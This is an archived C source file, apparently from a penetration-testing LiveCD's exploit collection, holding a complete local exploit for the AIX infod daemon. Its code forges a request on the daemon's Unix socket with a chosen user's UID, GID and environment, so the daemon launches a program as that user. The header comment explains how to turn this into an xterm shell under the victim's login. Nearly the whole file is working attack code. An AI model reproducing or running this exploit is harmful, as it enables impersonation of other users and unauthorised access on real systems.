home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / infod.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  6KB  |  223 lines
  1.     /* Infod AIX exploit (k) Arisme 21/11/98  - All Rights Reversed
  2.        Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)
  3.  
  4.        Run program with the login you want to exploit :)
  5.        When the window appears, select "options", "defaults", change printer
  6.        to something more useful (like /bin/x11/xterm) and print !
  7.  
  8.        Comments,questions : arisme@altern.org */
  9.  
  10.  
  11.     #include <sys/types.h>
  12.     #include <sys/socket.h>
  13.     #include <sys/un.h>
  14.     #include <netdb.h>
  15.     #include <stdio.h>
  16.     #include <stdlib.h>
  17.     #include <pwd.h>
  18.  
  19.     #define TAILLE_BUFFER 2000
  20.     #define SOCK_PATH "/tmp/.info-help"
  21.     #define PWD "/tmp"
  22.  
  23.     #define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-0
  24. 9-98.AIX.INFOD (http://www.repsec.com)"
  25.     #define NOUSER "Use : infofun [login]"
  26.     #define UNKNOWN "User does not exist !"
  27.     #define OK "Waiting for magic window ... if you have problems check the xho
  28. st "
  29.  
  30.     void send_environ(char *var,FILE *param)
  31.     { char tempo[TAILLE_BUFFER];
  32.       int taille;
  33.  
  34.       taille=strlen(var);
  35.       sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
  36.       fwrite(tempo,1,taille+4,param);
  37.     }
  38.  
  39.     main(int argc,char** argv)
  40.     { struct sockaddr_un sin,expediteur;
  41.       struct hostent *hp;
  42.       struct passwd *info;
  43.       int chaussette,taille_expediteur,port,taille_struct,taille_param;
  44.       char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
  45.       FILE *param;
  46.  
  47.       char *HOME,*LOGIN;
  48.       int UID,GID;
  49.  
  50.       printf("\n\n%s\n\n",KOPY);
  51.  
  52.       if (argc!=2) { printf("%s\n",NOUSER);
  53.                      exit(1); }
  54.  
  55.  
  56.       info=getpwnam(argv[1]);
  57.       if (!info)   { printf("%s\n",UNKNOWN);
  58.                      exit(1); }
  59.  
  60.       HOME=info->pw_dir;
  61.       LOGIN=info->pw_name;
  62.       UID=info->pw_uid;
  63.       GID=info->pw_gid;
  64.  
  65.       param=fopen("/tmp/tempo.fun","wb");
  66.  
  67.       chaussette=socket(AF_UNIX,SOCK_STREAM,0);
  68.       sin.sun_family=AF_UNIX;
  69.       strcpy(sin.sun_path,SOCK_PATH);
  70.       taille_struct=sizeof(struct sockaddr_un);
  71.  
  72.  
  73.       if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)
  74.          { perror("connect");
  75.            exit(1); }
  76.  
  77.  
  78.       /* 0 0 PF_UID pf_UID 0 0 */
  79.  
  80.       sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);
  81.       fwrite(buffer,1,6,param);
  82.  
  83.       /* PF_GID pf_GID */
  84.       sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));
  85.       fwrite(buffer,1,2,param);
  86.  
  87.       /* DISPLAY (259) */
  88.  
  89.       bzero(buffer,TAILLE_BUFFER);
  90.       strcpy(buffer,getenv("DISPLAY"));
  91.       fwrite(buffer,1,259,param);
  92.  
  93.       /* LANG (1 C 0 0 0 0 0 0 0) */
  94.  
  95.       sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0);
  96.       fwrite(buffer,1,9,param);
  97.  
  98.       /* size_$HOME $HOME 0 0 0 */
  99.  
  100.       send_environ(HOME,param);
  101.  
  102.       /* size_$LOGNAME $LOGNAME 0 0 0 */
  103.  
  104.       send_environ(LOGIN,param);
  105.  
  106.       /* size_$USERNAME $USERNAME 0 0 0 */
  107.  
  108.       send_environ(LOGIN,param);
  109.  
  110.       /* size_$PWD $PWD 0 0 0 */
  111.  
  112.       send_environ(PWD,param);
  113.  
  114.       /* size_DISPLAY DISPLAY 0 0 0 */
  115.  
  116.       //send_environ(ptsname(0),param);
  117.  
  118.       /* If we send our pts, info_gr will crash as it has already changed UID *
  119. /
  120.  
  121.       send_environ("/dev/null",param);
  122.  
  123.       /* It's probably not useful to copy all these environment vars but it was
  124.          good for debugging :) */
  125.  
  126.       sprintf(buffer,"%c%c%c%c",23,0,0,0);
  127.       fwrite(buffer,1,4,param);
  128.  
  129.       sprintf(buffer,"_=./startinfo");
  130.       send_environ(buffer,param);
  131.  
  132.       sprintf(buffer,"TMPDIR=/tmp");
  133.       send_environ(buffer,param);
  134.  
  135.       sprintf(buffer,"LANG=%s",getenv("LANG"));
  136.       send_environ(buffer,param);
  137.  
  138.       sprintf(buffer,"LOGIN=%s",LOGIN);
  139.       send_environ(buffer,param);
  140.  
  141.       sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH"));
  142.       send_environ(buffer,param);
  143.  
  144.       sprintf(buffer,"PATH=%s",getenv("PATH"));
  145.       send_environ(buffer,param);
  146.  
  147.       sprintf(buffer,"%s","EDITOR=emacs");
  148.       send_environ(buffer,param);
  149.  
  150.       sprintf(buffer,"LOGNAME=%s",LOGIN);
  151.       send_environ(buffer,param);
  152.  
  153.       sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN);
  154.       send_environ(buffer,param);
  155.  
  156.       sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME"));
  157.       send_environ(buffer,param);
  158.  
  159.       sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH"));
  160.       send_environ(buffer,param);
  161.  
  162.       sprintf(buffer,"%s","PS1=(exploited !) ");
  163.       send_environ(buffer,param);
  164.  
  165.       sprintf(buffer,"USER=%s",LOGIN);
  166.       send_environ(buffer,param);
  167.  
  168.       sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE"));
  169.       send_environ(buffer,param);
  170.  
  171.       sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY"));
  172.       send_environ(buffer,param);
  173.  
  174.       sprintf(buffer,"SHELL=%s",getenv("SHELL"));
  175.       send_environ(buffer,param);
  176.  
  177.       sprintf(buffer,"%s","ODMDIR=/etc/objrepos");
  178.       send_environ(buffer,param);
  179.  
  180.       sprintf(buffer,"HOME=%s",HOME);
  181.       send_environ(buffer,param);
  182.  
  183.       sprintf(buffer,"%s","TERM=vt220");
  184.       send_environ(buffer,param);
  185.  
  186.       sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]");
  187.       send_environ(buffer,param);
  188.  
  189.       sprintf(buffer,"PWD=%s",PWD);
  190.       send_environ(buffer,param);
  191.  
  192.       sprintf(buffer,"%s","TZ=NFT-1");
  193.       send_environ(buffer,param);
  194.  
  195.       sprintf(buffer,"%s","A__z=! LOGNAME");
  196.       send_environ(buffer,param);
  197.  
  198.       /* Start info_gr with -q parameter or the process will be run locally and
  199.          not from the daemon ... */
  200.  
  201.       sprintf(buffer,"%c%c%c%c",1,45,113,0);
  202.       fwrite(buffer,1,4,param);
  203.  
  204.       fclose(param);
  205.  
  206.       param=fopen("/tmp/tempo.fun","rb");
  207.       fseek(param,0,SEEK_END);
  208.       taille_param=ftell(param);
  209.       fseek(param,0,SEEK_SET);
  210.       fread(paramz,1,taille_param,param);
  211.       fclose(param);
  212.  
  213.       unlink("/tmp/tempo.fun");
  214.  
  215.       /* Thank you Mr daemon :) */
  216.  
  217.       write(chaussette,paramz,taille_param);
  218.  
  219.       printf("\n%s %s\n",OK,getenv("HOSTNAME"));
  220.  
  221.       close(chaussette);
  222.     }
  223.